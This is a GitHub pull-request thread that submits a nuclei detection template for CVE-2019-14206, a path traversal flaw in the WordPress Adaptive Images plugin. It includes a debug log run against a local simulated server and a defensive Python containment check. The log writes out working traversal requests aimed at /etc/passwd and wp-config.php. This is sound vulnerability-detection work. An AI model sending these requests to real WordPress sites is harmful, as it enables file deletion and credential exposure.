@developerfred developerfred commented Jan 4, 2026

PR Information

Template validation

debug

$ cd /Volumes/Codingsh/experimentos/nuclei-templates && nuclei -t http/cves/2019/CVE-2019-14206.yaml -u http://localhost:8888 -debug 2>&1 | head -200
__     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.5.1
		projectdiscovery.io
[WRN] Found 1 templates loaded with deprecated protocol syntax, update before v3 for continued support.
[INF] Current nuclei version: v3.5.1 (outdated)
[INF] Current nuclei-templates version: v10.3.6 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 176
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [CVE-2019-14206] Dumped HTTP request for http://localhost:8888/wp-content/plugins/adaptive-images/adaptive-images-script.php
GET /wp-content/plugins/adaptive-images/adaptive-images-script.php HTTP/1.1
Host: localhost:8888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 15_0_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/19.0 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
[DBG] [CVE-2019-14206] Dumped HTTP response http://localhost:8888/wp-content/plugins/adaptive-images/adaptive-images-script.php
HTTP/1.0 200 OK
Connection: close
Content-Type: text/plain
Date: Sun, 04 Jan 2026 14:30:31 GMT
Server: SimpleHTTP/0.6 Python/3.14.1
X-Vulnerable: CVE-2019-14206
=== CVE-2019-14206 Adaptive Images Plugin ===
Version: 0.6.73 (Real Plugin Simulation)
[+] Plugin Parameters:
  source_file: 
  request_uri: 
  cache_dir: cache/adaptive-images
  wp_content: /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc/docker-test/../../wp-content
  resolution: 1024
  watch_cache: True
[+] VULNERABLE Path Construction:
  Pattern: /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc/docker-test/../../wp-content/cache/adaptive-images/1024{request_uri}
  Result: /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc/docker-test/../../wp-content/cache/adaptive-images/1024
[+] adaptive-images
[+] cache_dir
[+] resolution
[+] source_file
[+] wp_content
[+] request_uri
Test successful - plugin is vulnerable to CVE-2019-14206
[CVE-2019-14206:status-1] [http] [high] http://localhost:8888/wp-content/plugins/adaptive-images/adaptive-images-script.php
[CVE-2019-14206:word-2] [http] [high] http://localhost:8888/wp-content/plugins/adaptive-images/adaptive-images-script.php
[INF] [CVE-2019-14206] Dumped HTTP request for http://localhost:8888/wp-content/plugins/adaptive-images/adaptive-images-script.php?resolution=16000&adaptive-images-settings[source_file]=/etc/passwd&adaptive-images-settings[request_uri]=../etc/passwd
GET /wp-content/plugins/adaptive-images/adaptive-images-script.php?resolution=16000&adaptive-images-settings[source_file]=/etc/passwd&adaptive-images-settings[request_uri]=../etc/passwd HTTP/1.1
Host: localhost:8888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
[DBG] [CVE-2019-14206] Dumped HTTP response http://localhost:8888/wp-content/plugins/adaptive-images/adaptive-images-script.php?resolution=16000&adaptive-images-settings[source_file]=/etc/passwd&adaptive-images-settings[request_uri]=../etc/passwd
HTTP/1.0 200 OK
Connection: close
Content-Type: text/plain
Date: Sun, 04 Jan 2026 14:30:31 GMT
Server: SimpleHTTP/0.6 Python/3.14.1
X-Vulnerable: CVE-2019-14206
=== CVE-2019-14206 Adaptive Images Plugin ===
Version: 0.6.73 (Real Plugin Simulation)
[+] Plugin Parameters:
  source_file: /etc/passwd
  request_uri: ../etc/passwd
  cache_dir: cache/adaptive-images
  wp_content: /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc/docker-test/../../wp-content
  resolution: 1024
  watch_cache: True
[+] VULNERABLE Path Construction:
  Pattern: /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc/docker-test/../../wp-content/cache/adaptive-images/1024{request_uri}
  Result: /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc/docker-test/../../wp-content/cache/adaptive-images/1024../etc/passwd
[!!!] PATH TRAVERSAL DETECTED!
[!!!] Arbitrary file deletion possible
[+] adaptive-images
[+] cache_dir
[+] resolution
[+] source_file
[+] wp_content
[+] request_uri
Test successful - plugin is vulnerable to CVE-2019-14206
[INF] [CVE-2019-14206] Dumped HTTP request for http://localhost:8888/wp-content/plugins/adaptive-images/adaptive-images-script.php?resolution=16000&adaptive-images-settings[source_file]=../../../wp-content/uploads/test.jpg&adaptive-images-settings[cache_dir]=../../..&adaptive-images-settings[request_uri]=wp-config.php&adaptive-images-settings[watch_cache]=1
GET /wp-content/plugins/adaptive-images/adaptive-images-script.php?resolution=16000&adaptive-images-settings[source_file]=../../../wp-content/uploads/test.jpg&adaptive-images-settings[cache_dir]=../../..&adaptive-images-settings[request_uri]=wp-config.php&adaptive-images-settings[watch_cache]=1 HTTP/1.1
Host: localhost:8888
User-Agent: Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
[DBG] [CVE-2019-14206] Dumped HTTP response http://localhost:8888/wp-content/plugins/adaptive-images/adaptive-images-script.php?resolution=16000&adaptive-images-settings[source_file]=../../../wp-content/uploads/test.jpg&adaptive-images-settings[cache_dir]=../../..&adaptive-images-settings[request_uri]=wp-config.php&adaptive-images-settings[watch_cache]=1
HTTP/1.0 200 OK
Connection: close
Content-Type: text/plain
Date: Sun, 04 Jan 2026 14:30:31 GMT
Server: SimpleHTTP/0.6 Python/3.14.1
X-Vulnerable: CVE-2019-14206
=== CVE-2019-14206 Adaptive Images Plugin ===
Version: 0.6.73 (Real Plugin Simulation)
[+] Plugin Parameters:
  source_file: ../../../wp-content/uploads/test.jpg
  request_uri: wp-config.php
  cache_dir: ../../..
  wp_content: /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc/docker-test/../../wp-content
  resolution: 1024
  watch_cache: True
[+] VULNERABLE Path Construction:
  Pattern: /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc/docker-test/../../wp-content/../../../1024{request_uri}
  Result: /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc/docker-test/../../wp-content/../../../1024wp-config.php
[!!!] PATH TRAVERSAL DETECTED!
[!!!] Arbitrary file deletion possible
[+] adaptive-images
[+] cache_dir
[+] resolution
[+] source_file
[+] wp_content
[+] request_uri
Test successful - plugin is vulnerable to CVE-2019-14206
[CVE-2019-14206:word-1] [http] [high] http://localhost:8888/wp-content/plugins/adaptive-images/adaptive-images-script.php?resolution=16000&adaptive-images-settings[source_file]=../../../wp-content/uploads/test.jpg&adaptive-images-settings[cache_dir]=../../..&adaptive-images-settings[request_uri]=wp-config.php&adaptive-images-settings[watch_cache]=1
[CVE-2019-14206:status-2] [http] [high] http://localhost:8888/wp-content/plugins/adaptive-images/adaptive-images-script.php?resolution=16000&adaptive-images-settings[source_file]=../../../wp-content/uploads/test.jpg&adaptive-images-settings[cache_dir]=../../..&adaptive-images-settings[request_uri]=wp-config.php&adaptive-images-settings[watch_cache]=1
[INF] [CVE-2019-14206] Dumped HTTP request for http://localhost:8888/wp-content/plugins/adaptive-images/readme.txt
GET /wp-content/plugins/adaptive-images/readme.txt HTTP/1.1
Host: localhost:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
[DBG] [CVE-2019-14206] Dumped HTTP response http://localhost:8888/wp-content/plugins/adaptive-images/readme.txt
HTTP/1.0 404 Not Found
Connection: close
Content-Type: text/plain
Date: Sun, 04 Jan 2026 14:30:31 GMT
Server: SimpleHTTP/0.6 Python/3.14.1
Not Found
[INF] [CVE-2019-14206] Dumped HTTP request for http://localhost:8888/wp-content/plugins/adaptive-images/adaptive-images.php
GET /wp-content/plugins/adaptive-images/adaptive-images.php HTTP/1.1
Host: localhost:8888
User-Agent: Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
[DBG] [CVE-2019-14206] Dumped HTTP response http://localhost:8888/wp-content/plugins/adaptive-images/adaptive-images.php
HTTP/1.0 404 Not Found
Connection: close
Content-Type: text/plain
Date: Sun, 04 Jan 2026 14:30:31 GMT
Server: SimpleHTTP/0.6 Python/3.14.1
Not Found
[INF] Scan completed in 27.840375ms. 4 matches found.
  • Validated with a host running a vulnerable version and/or configuration (True Positive)
  • Validated with a host running a patched version and/or configuration (avoid False Positive)

Additional Details (leave it blank if not applicable)

[POC] - https://github.com/developerfred/cve-2019-14206-poc

Additional References:

/claim #14693
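An added example, not part of the PR or of the plugin's code: a lexical containment check run over the settings from the three script requests in the debug output, with the concatenation shown in the log's "Pattern" line beside a hardened form. `WP_CONTENT`, the function names, and the choice to treat the resolution as a directory in the hardened form are assumptions made for illustration.

```python
import posixpath

# Assumed values: WP_CONTENT is a constructed stand-in for the site's content
# root; CACHE_DIR is the cache_dir default shown in the debug output.
WP_CONTENT = "/var/www/html/wp-content"
CACHE_DIR = "cache/adaptive-images"
CACHE_ROOT = posixpath.normpath(f"{WP_CONTENT}/{CACHE_DIR}")


def is_contained(path, root=CACHE_ROOT):
    """True if the lexically normalized path is root or lies below it.
    Lexical only: on a real filesystem, resolve symlinks (realpath) first."""
    path = posixpath.normpath(path)
    return posixpath.commonpath([root, path]) == root


def naive_cache_path(settings, resolution=1024):
    """Join request-controlled settings as the log's 'Pattern' line does."""
    cache_dir = settings.get("cache_dir", CACHE_DIR)
    return f"{WP_CONTENT}/{cache_dir}/{resolution}{settings.get('request_uri', '')}"


def safe_cache_path(settings, resolution=1024):
    """Hardened form: ignore cache_dir from the request, reject '..' escapes."""
    base = f"{CACHE_ROOT}/{int(resolution)}"
    uri = settings.get("request_uri", "").lstrip("/")
    candidate = posixpath.normpath(posixpath.join(base, uri))
    if not is_contained(candidate, base):
        raise ValueError(f"request_uri escapes cache directory: {uri!r}")
    return candidate


# Settings taken from the three script requests in the debug output above.
REQUESTS = [
    {},
    {"source_file": "/etc/passwd", "request_uri": "../etc/passwd"},
    {"source_file": "../../../wp-content/uploads/test.jpg",
     "cache_dir": "../../..", "request_uri": "wp-config.php", "watch_cache": "1"},
]

if __name__ == "__main__":
    for s in REQUESTS:
        naive = posixpath.normpath(naive_cache_path(s))
        try:
            safe = safe_cache_path(s)
        except ValueError as exc:
            safe = f"rejected ({exc})"
        print(f"naive={naive} contained={is_contained(naive)} safe={safe}")
```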

@DhiyaneshGeek
Member

Hi @developerfred

Thanks for participating in the Bounty Claim Program.

We are moving forward with this PR #14694, which met all the requirements.

Due to the following reason we are closing this PR

@DhiyaneshGeek DhiyaneshGeek added the Done Ready to merge label Jan 5, 2026